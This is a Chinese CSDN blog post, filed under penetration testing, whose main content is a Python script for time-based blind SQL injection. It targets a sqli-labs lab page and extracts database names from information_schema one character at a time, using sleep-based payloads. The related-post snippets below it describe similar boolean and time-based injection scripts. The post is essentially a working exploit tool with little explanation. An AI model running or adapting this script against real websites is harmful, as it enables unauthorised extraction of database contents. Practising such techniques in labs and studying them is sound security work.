python-盲注

最新推荐文章于 2023-04-22 18:21:40 发布
最新推荐文章于 2023-04-22 18:21:40 发布
阅读量386 收藏
点赞数 1
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41232519/article/details/105681224
版权 
import requests
import time

#目标url
url = 'http://192.168.8.152/sql/Less-1/?id=1'

#查库语句
database = 'select schema_name from information_schema.schemata'

#查当前表语句
table = 'select table_name from information_schema.tables where table_schema=database()'

#查段语句
column = 'select column_name from information_schema.columns where table_name="table_name"'

#设置一个空字符串,等会接受查询出来数据
result = ''

#i表示表的长度,一般不会超过30
for i in range(1,30):
    
    #j表示ascii码(a-z,0-9还有一些符号_)一般也不会超过这些
    for j in range(48,122):
        
        #注入语句(此处是数字型注入)
        payload = "' and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),0)--+".format(database,i,j)
        
        #开始时间
        stime = time.time()
        
        #将网址和注入语句拼接请求
        r = requests.get(url+payload)
        
        #结束时间
        etime = time.time()   
        
        #因为是盲注所以判断时间查
        if  etime-stime >= 2:
            
            #将匹配到的字符添加到result中去
            result += chr(j)
            
            #打印匹配到的字符
            print(result)
            
            #跳出此次循环
            break
lnterpreter
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python-Sql检测
weixin_57041250的博客
11-02 214
sql分为布尔型,时间型
爱上python之探测脚本
dfdhxb995397的博客
09-13 159
  本文转自:i春秋论坛 前言:   最近在学python,做了个的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔的靶机   另外感谢大表姐的指导。   稍作解释:入语句里用%s占位,等待在for循里面依次判断长度 [App...
python substr_python
weixin_39695306的博客
11-27 88
给大家来一份python的代码我自己改了一些内容,到时候我把其封装成为.exe文件,或者.apk文件,再把资源发出来,接下来是代码 import requests# 爆数据库长度def db_length(url,s): db_length = 0 for i in range(1, 20): db_payload = "2%s and (length(da...
Python-Boolean脚本(附带释,总脚本在结尾)
sGanYu
02-27 1192
靶场:CTFHub 设置重新连接,默认的情况下keep-alive为True # -*- coding: UTF-8 -*- import requests import optparse # 实现为脚本传递命令参数 import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} flag = "query_success" # 判断Ture回显的特定内容 r1 = int(input('设置重连次数
Python编写自动化脚本
qq_42990434的博客
05-14 1457
入中它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编写简单的 python脚 本,来提高挖的效率。 说到的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编写我也是用二分法的,下面我会用自己数据库名字的例子来说明一下: #!/usr/bin/env python # coding:utf-8 import requests import sys url = "http://xxx.xxx.xxx.xxx/xxx/xxx
布尔.py_sqlpython_
10-03
一个简单的sql的python脚本,其中语句需要根据环境条件做改变
时间python脚本.zip
12-28
python编写时间自动化的脚本
python编写的sql
10-28
python编写的sql
布尔python3范本模板
01-16
布尔python3范本模板
布尔python脚本
04-22
.py文件,python脚本实现布尔,输入网址实现自动化入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 意事项:python3.8,就用了一个requests第三方库,单线程实现...
python实现sql
箭雨镜屋
03-01 713
背景介绍 本文这段python代码之前发布在我的博客WebGoat (A1) SQL Injection (advanced)中,用于通过sql布尔获取WebGoat SQL Injection (advanced)第5页的用户tom的密码。 代码比较简单 ,这里单独拎出来主要是为了自己以后查阅方便。如果遇到其他入问题,可以简单修改headers,payload,以及response.text中检查的内容。如果以后代码有较大改动,便会更新本文。 代码 import requests ur
python脚本实现sql时间
wrypot的博客
03-27 686
python脚本实现sql sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
python脚本实现半自动化布尔
weixin_44255856的博客
04-27 869
原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔/ from optparse import OptionParser import sys import requests import hashlib parser=OptionParser() parser.add_option("-D", "--database", a...
python解决和延迟入笔记
qq_43571759的博客
03-15 975
python解决和延迟入笔记 requests模块 要用python解决这一问题需要了解request这个模块,我下载的是pycharm所以自带这个模块不用安装,需要安装的话 pip install requests pip命令执行就能安装成功,然后是关于requests模块的一些函数: get请求 post请求 res=request.get(url,params=dat...
使用python进行sql布尔exp的编写
CC210231的博客
04-04 2528
前言: 前面学习并实现了简单的入exp编写,那是根据入的payload 匹配 网页内容得到入数据,像这种exp只能应用于简单的入,入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔,也就是页面只会返回两种状态,一种是入语句正确执行返回正常页面,一种就是入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们入语句是否正确执行,在sql布尔中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
python实现sql时间
箭雨镜屋
04-26 970
一、python代码 二、使用方法 三、测试
Python自动化sql入:布尔
qq_46145027的博客
04-22 3061
在sql入时,使用python脚本可以大大提高入效率,这里演示一下编写python脚本实现布尔的基本流程:演示靶场:sqli-labs。
Python之路 | 布尔、延时EXP编写
IerkeU的博客
03-29 853
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
帮我写一个时间的python脚本
weixin_35757531的博客
01-03 180
时间攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
python写布尔
最新发布
05-01
在 Python 中,可以通过构造 SQL 语句,来实现布尔。 以下是一个简单的 Python 布尔脚本的示例: ```python import requests url = "http://example.com/login.php" # 替换成具体的目标网站 URL payload...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值